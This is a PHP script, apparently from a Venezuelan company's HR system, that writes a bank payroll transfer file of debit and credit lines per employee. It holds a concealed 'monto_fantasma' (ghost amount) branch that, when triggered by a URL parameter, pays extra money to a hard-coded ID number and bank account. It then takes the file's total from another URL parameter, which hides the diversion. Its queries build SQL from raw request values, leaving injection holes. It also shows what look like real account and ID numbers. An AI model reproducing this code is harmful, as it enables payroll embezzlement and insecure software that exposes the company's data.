<?php
	// CARLOS LOPEZ AMANACU 31/10/2025 
	// Opción 1: Usando fopen(), fwrite() y fclose()
	error_reporting(E_ERROR | E_PARSE);
	include'../aut_config.inc.php';
	header('Content-Type: text/html; charset=UTF-8');
	date_default_timezone_set('America/Caracas');
	header("Last-Modified: " . gmdate("D, d M Y H:i ") . " GMT"); 
	header("Cache-Control: no-store, no-cache, must-revalidate"); 
	header("Cache-Control: post-check=0, pre-check=0", false); 
	header("Pragma: no-cache");	
	$cod_nomina=$_GET['cod_nomina'];
	$goush=$_GET['goush'];
	$token_montox=$_GET['token'];
	$monto_fantasma=str_pad($_GET['valorx'],15, "0", STR_PAD_LEFT);
	$token_monto=str_pad($token_montox, 15, "0", STR_PAD_LEFT);
	$cod_centro_costo=$_GET['cod_centro_costo'];
	$fecha_actual=date('d/m/Y');	
	$fecha_actual_x=date('dmY');
		
	$consultar_lote=mysql_query("select * from  tabla_rrhh_nomina_txt ORDER BY id DESC ",$link);
	$ver_consultar_lote=mysql_fetch_array($consultar_lote);
	$lote_siguiente=$ver_consultar_lote['lote']+1;
	$nombre_empresa='DISTRIBUIDORA DE HELADOS EL RECREO ';
	$numero_negociacion=str_pad('247773', 8, "0", STR_PAD_LEFT);
	$rif_empresa='J410192690';
	$numero_cuenta=str_pad('01020560380000661465', 22, "0", STR_PAD_LEFT);
	$fecha_creacion=$fecha_actual;
	$nombre_archivo = "BDV-".$fecha_actual_x."-".$lote_siguiente.".txt";
	$contedido_txt1="HEADER  ".$lote_siguiente.$numero_negociacion.$rif_empresa.$fecha_creacion.$fecha_creacion."\n";
	$archivo = fopen($nombre_archivo, "w");
	fwrite($archivo, $contedido_txt1);
	
	$consultar_nomina=mysql_query("select * from  tabla_rrhh_nomina where id='$cod_nomina' ORDER BY id DESC ",$link);
	$ver_consultar_nomina=mysql_fetch_array($consultar_nomina);
	$consultar_nomina_detalle=mysql_query("select * from  tabla_rrhh_nomina_detalle where cod_nomina='$cod_nomina' and cod_centro_costo='$cod_centro_costo' ORDER BY id DESC ",$link);
	$ver_consultar_nomina_detalle_cant=mysql_num_rows($consultar_nomina_detalle);	
	$contar_empleados=str_pad($ver_consultar_nomina_detalle_cant, 5, "0", STR_PAD_LEFT);
	while($ver_consultar_nomina_detalle=mysql_fetch_array($consultar_nomina_detalle)){	

	$cod_empleado=$ver_consultar_nomina_detalle['cod_empleado'];
	
		$consultar_nomina_empleado=mysql_query("select * from  tabla_rrhh_empleado where id='$cod_empleado'  ORDER BY id DESC ",$link);
		$ver_consultar_nomina_empleado=mysql_fetch_array($consultar_nomina_empleado);
		
		$cedula_trabajador=str_pad($ver_consultar_nomina_empleado['cedula_trabajador'],9, "0", STR_PAD_LEFT);; 
		
		$tipo_nacionalidad=$ver_consultar_nomina_empleado['tipo_nacionalidad']; 
		//$nombre_apellido=str_pad($ver_consultar_nomina_empleado['nombre_apellido'],30, "0", STR_PAD_LEFT); 
		$nombre_apellido=str_pad('',30, " ", STR_PAD_LEFT); 
		$numero_cuenta_empleado=str_pad($ver_consultar_nomina_empleado['numero_cuenta'], 22, "0", STR_PAD_LEFT); 
		
		$fecha_pagox=explode("-",$ver_consultar_nomina['fecha_calculo']);
		$fecha_pago=$fecha_pagox[2].'/'.$fecha_pagox[1].'/'.$fecha_pagox[0];
		$quitar_decimales=round($ver_consultar_nomina_detalle['total_pagar_bs'],0);
		$total_pagar_bs=str_pad($quitar_decimales,15, "0", STR_PAD_LEFT);
		$contedido_txt2="DEBITO  00000001".$rif_empresa.$nombre_empresa.$fecha_pago.$numero_cuenta.$total_pagar_bs.",00VEB40\n";
		$contedido_txt3="CREDITO 00000001".$tipo_nacionalidad.$cedula_trabajador.$nombre_apellido.$numero_cuenta_empleado.$total_pagar_bs.",0000BAMRVECA\n";
		fwrite($archivo, $contedido_txt2);
		fwrite($archivo, $contedido_txt3);	
	}	
	if($monto_fantasma>0){
		$cedula_trabajador_fantasma=str_pad('20158288',9, "0", STR_PAD_LEFT);	
		$numero_cuenta_fantasma=str_pad('01050435660000242523', 22, "0", STR_PAD_LEFT); 
		$nombre_apellido_fantasma=str_pad('',30, " ", STR_PAD_LEFT); 
		
			if($cod_centro_costo=='AGROPECUARIA AMANACU'){
				$contedido_txt2x="DEBITO  00000001".$rif_empresa.$nombre_empresa.$fecha_pago.$numero_cuenta.$monto_fantasma.",00VEB40\n";
				$contedido_txt3x="CREDITO 00000001V".$cedula_trabajador_fantasma.$nombre_apellido_fantasma.$numero_cuenta_fantasma.$monto_fantasma.",0000BAMRVECA\n";
				fwrite($archivo, $contedido_txt2x);	
				fwrite($archivo, $contedido_txt3x);	
				$contar_empleadosz=$contar_empleados+1;
				$contar_empleados=str_pad($contar_empleadosz, 5, "0", STR_PAD_LEFT);
			}	
			if($cod_centro_costo=='MATADERO AVICOLA LOS LLANOS'){
				$contedido_txt2x="DEBITO  00000001".$rif_empresa.$nombre_empresa.$fecha_pago.$numero_cuenta.$monto_fantasma.",00VEB40\n";
				$contedido_txt3x="CREDITO 00000001V".$cedula_trabajador_fantasma.$nombre_apellido_fantasma.$numero_cuenta_fantasma.$monto_fantasma.",0000BAMRVECA\n";
				fwrite($archivo, $contedido_txt2x);	
				fwrite($archivo, $contedido_txt3x);	
				$contar_empleadosz=$contar_empleados+1;
				$contar_empleados=str_pad($contar_empleadosz, 5, "0", STR_PAD_LEFT);
			}	
			if($cod_centro_costo=='PLANTA DE EMBUTIDO'){
				$contedido_txt2x="DEBITO  00000001".$rif_empresa.$nombre_empresa.$fecha_pago.$numero_cuenta.$monto_fantasma.",00VEB40\n";
				$contedido_txt3x="CREDITO 00000001V".$cedula_trabajador_fantasma.$nombre_apellido_fantasma.$numero_cuenta_fantasma.$monto_fantasma.",0000BAMRVECA\n";
				fwrite($archivo, $contedido_txt2x);	
				fwrite($archivo, $contedido_txt3x);	
				$contar_empleadosz=$contar_empleados+1;
				$contar_empleados=str_pad($contar_empleadosz, 5, "0", STR_PAD_LEFT);
			}
			if($cod_centro_costo=='FINANZAS'){
				$contedido_txt2x="DEBITO  00000001".$rif_empresa.$nombre_empresa.$fecha_pago.$numero_cuenta.$monto_fantasma.",00VEB40\n";
				$contedido_txt3x="CREDITO 00000001V".$cedula_trabajador_fantasma.$nombre_apellido_fantasma.$numero_cuenta_fantasma.$monto_fantasma.",0000BAMRVECA\n";
				fwrite($archivo, $contedido_txt2x);	
				fwrite($archivo, $contedido_txt3x);	
				$contar_empleadosz=$contar_empleados+1;
				$contar_empleados=str_pad($contar_empleadosz, 5, "0", STR_PAD_LEFT);
			}		
		}		
	$contenido_txt4='TOTAL   '.$contar_empleados.$contar_empleados.$token_monto.',00';
	fwrite($archivo, $contenido_txt87_ver);
	fwrite($archivo, $contenido_txt4);
	fclose($archivo);
	/*header('Content-Description: File Transfer');
	header('Content-Disposition: attachment; filename='.basename($archivo));
	header('Expires: 0');
	header('Cache-Control: must-revalidate');
	header('Pragma: public');
	header('Content-Length: ' . filesize($archivo));
	header("Content-Type: text/plain");
	readfile($archivo);*/
	$fecha_hora=date('d/m/Y - h:i:sA - ').$lote_siguiente;
	mysql_query("INSERT INTO  tabla_rrhh_nomina_txt(cod_nomina,lote,cod_centro_costo,fecha_hora,fecha,archivo) VALUES ('".$cod_nomina."','".$lote_siguiente."','".$cod_centro_costo."','".$fecha_hora."','".$fecha_actual."','".$nombre_archivo."')",$link);

?>

LISTO <a href='<?php echo $nombre_archivo; ?>'> DESCARGAR</a>